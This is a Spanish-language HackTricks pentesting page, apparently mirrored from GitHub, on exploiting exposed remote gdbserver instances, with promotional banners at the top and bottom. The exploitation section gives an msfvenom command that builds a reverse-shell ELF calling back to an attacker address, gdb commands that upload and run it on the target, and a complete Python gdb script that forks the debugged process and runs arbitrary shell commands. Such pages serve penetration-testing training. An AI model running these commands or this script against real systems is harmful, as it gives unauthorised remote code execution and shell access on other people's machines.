mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
215 lines
10 KiB
Markdown
215 lines
10 KiB
Markdown
|
# Pentesting Remote GdbServer
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|
||
|
|
||
|
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
|
||
|
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
|
||
|
|
||
|
{% embed url="https://www.dragonjarcon.org/" %}
|
||
|
|
||
|
## **Información básica**
|
||
|
|
||
|
**gdbserver** es un programa informático que permite depurar de forma remota otros programas. Ejecutándose en el mismo sistema que el programa a depurar, permite que el **Depurador GNU se conecte desde otro sistema**; es decir, solo el ejecutable a depurar necesita estar residente en el sistema objetivo ("destino"), mientras que el código fuente y una copia del archivo binario a depurar residen en el ordenador local del desarrollador ("anfitrión"). La conexión puede ser TCP o una línea serie.
|
||
|
|
||
|
Puedes hacer que un **gdbserver escuche en cualquier puerto** y en este momento **nmap no es capaz de reconocer el servicio**.
|
||
|
|
||
|
## Explotación
|
||
|
|
||
|
### Cargar y ejecutar
|
||
|
|
||
|
Puedes crear fácilmente una **puerta trasera elf con msfvenom**, cargarla y ejecutarla:
|
||
|
```bash
|
||
|
# Trick shared by @B1n4rySh4d0w
|
||
|
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
|
||
|
|
||
|
chmod +x binary.elf
|
||
|
|
||
|
gdb binary.elf
|
||
|
|
||
|
# Set remote debuger target
|
||
|
target extended-remote 10.10.10.11:1337
|
||
|
|
||
|
# Upload elf file
|
||
|
remote put binary.elf binary.elf
|
||
|
|
||
|
# Set remote executable file
|
||
|
set remote exec-file /home/user/binary.elf
|
||
|
|
||
|
# Execute reverse shell executable
|
||
|
run
|
||
|
|
||
|
# You should get your reverse-shell
|
||
|
```
|
||
|
### Ejecutar comandos arbitrarios
|
||
|
|
||
|
Existe otra forma de **hacer que el depurador ejecute comandos arbitrarios mediante un script personalizado de Python tomado de** [**aquí**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**.**
|
||
|
```bash
|
||
|
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
|
||
|
target extended-remote 192.168.1.4:2345
|
||
|
|
||
|
# Load our custom gdb command `rcmd`.
|
||
|
source ./remote-cmd.py
|
||
|
|
||
|
# Change to a trusty binary and run it to load it
|
||
|
set remote exec-file /bin/bash
|
||
|
r
|
||
|
|
||
|
# Run until a point where libc has been loaded on the remote process, e.g. start of main().
|
||
|
tb main
|
||
|
r
|
||
|
|
||
|
# Run the remote command, e.g. `ls`.
|
||
|
rcmd ls
|
||
|
```
|
||
|
En primer lugar, **crea localmente este script**:
|
||
|
|
||
|
{% code title="remote-cmd.py" %}
|
||
|
```python
|
||
|
#!/usr/bin/env python3
|
||
|
|
||
|
import gdb
|
||
|
import re
|
||
|
import traceback
|
||
|
import uuid
|
||
|
|
||
|
|
||
|
class RemoteCmd(gdb.Command):
|
||
|
def __init__(self):
|
||
|
self.addresses = {}
|
||
|
|
||
|
self.tmp_file = f'/tmp/{uuid.uuid4().hex}'
|
||
|
gdb.write(f"Using tmp output file: {self.tmp_file}.\n")
|
||
|
|
||
|
gdb.execute("set detach-on-fork off")
|
||
|
gdb.execute("set follow-fork-mode parent")
|
||
|
|
||
|
gdb.execute("set max-value-size unlimited")
|
||
|
gdb.execute("set pagination off")
|
||
|
gdb.execute("set print elements 0")
|
||
|
gdb.execute("set print repeats 0")
|
||
|
|
||
|
super(RemoteCmd, self).__init__("rcmd", gdb.COMMAND_USER)
|
||
|
|
||
|
def preload(self):
|
||
|
for symbol in [
|
||
|
"close",
|
||
|
"execl",
|
||
|
"fork",
|
||
|
"free",
|
||
|
"lseek",
|
||
|
"malloc",
|
||
|
"open",
|
||
|
"read",
|
||
|
]:
|
||
|
self.load(symbol)
|
||
|
|
||
|
def load(self, symbol):
|
||
|
if symbol not in self.addresses:
|
||
|
address_string = gdb.execute(f"info address {symbol}", to_string=True)
|
||
|
match = re.match(
|
||
|
f'Symbol "{symbol}" is at ([0-9a-fx]+) .*', address_string, re.IGNORECASE
|
||
|
)
|
||
|
if match and len(match.groups()) > 0:
|
||
|
self.addresses[symbol] = match.groups()[0]
|
||
|
else:
|
||
|
raise RuntimeError(f'Could not retrieve address for symbol "{symbol}".')
|
||
|
|
||
|
return self.addresses[symbol]
|
||
|
|
||
|
def output(self):
|
||
|
# From `fcntl-linux.h`
|
||
|
O_RDONLY = 0
|
||
|
gdb.execute(
|
||
|
f'set $fd = (int){self.load("open")}("{self.tmp_file}", {O_RDONLY})'
|
||
|
)
|
||
|
|
||
|
# From `stdio.h`
|
||
|
SEEK_SET = 0
|
||
|
SEEK_END = 2
|
||
|
gdb.execute(f'set $len = (int){self.load("lseek")}($fd, 0, {SEEK_END})')
|
||
|
gdb.execute(f'call (int){self.load("lseek")}($fd, 0, {SEEK_SET})')
|
||
|
if int(gdb.convenience_variable("len")) <= 0:
|
||
|
gdb.write("No output was captured.")
|
||
|
return
|
||
|
|
||
|
gdb.execute(f'set $mem = (void*){self.load("malloc")}($len)')
|
||
|
gdb.execute(f'call (int){self.load("read")}($fd, $mem, $len)')
|
||
|
gdb.execute('printf "%s\\n", (char*) $mem')
|
||
|
|
||
|
gdb.execute(f'call (int){self.load("close")}($fd)')
|
||
|
gdb.execute(f'call (int){self.load("free")}($mem)')
|
||
|
|
||
|
def invoke(self, arg, from_tty):
|
||
|
try:
|
||
|
self.preload()
|
||
|
|
||
|
is_auto_solib_add = gdb.parameter("auto-solib-add")
|
||
|
gdb.execute("set auto-solib-add off")
|
||
|
|
||
|
parent_inferior = gdb.selected_inferior()
|
||
|
gdb.execute(f'set $child_pid = (int){self.load("fork")}()')
|
||
|
child_pid = gdb.convenience_variable("child_pid")
|
||
|
child_inferior = list(
|
||
|
filter(lambda x: x.pid == child_pid, gdb.inferiors())
|
||
|
)[0]
|
||
|
gdb.execute(f"inferior {child_inferior.num}")
|
||
|
|
||
|
try:
|
||
|
gdb.execute(
|
||
|
f'call (int){self.load("execl")}("/bin/sh", "sh", "-c", "exec {arg} >{self.tmp_file} 2>&1", (char*)0)'
|
||
|
)
|
||
|
except gdb.error as e:
|
||
|
if (
|
||
|
"The program being debugged exited while in a function called from GDB"
|
||
|
in str(e)
|
||
|
):
|
||
|
pass
|
||
|
else:
|
||
|
raise e
|
||
|
finally:
|
||
|
gdb.execute(f"inferior {parent_inferior.num}")
|
||
|
gdb.execute(f"remove-inferiors {child_inferior.num}")
|
||
|
|
||
|
self.output()
|
||
|
except Exception as e:
|
||
|
gdb.write("".join(traceback.TracebackException.from_exception(e).format()))
|
||
|
raise e
|
||
|
finally:
|
||
|
gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
|
||
|
|
||
|
|
||
|
RemoteCmd()
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
[**DragonJAR Security Conference**](https://www.dragonjarcon.org/) **es un evento internacional de ciberseguridad** con más de una década de existencia que se llevará a cabo los días 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
|
||
|
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
|
||
|
|
||
|
{% embed url="https://www.dragonjarcon.org/" %}
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
|
||
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
||
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
||
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||
|
|
||
|
</details>
|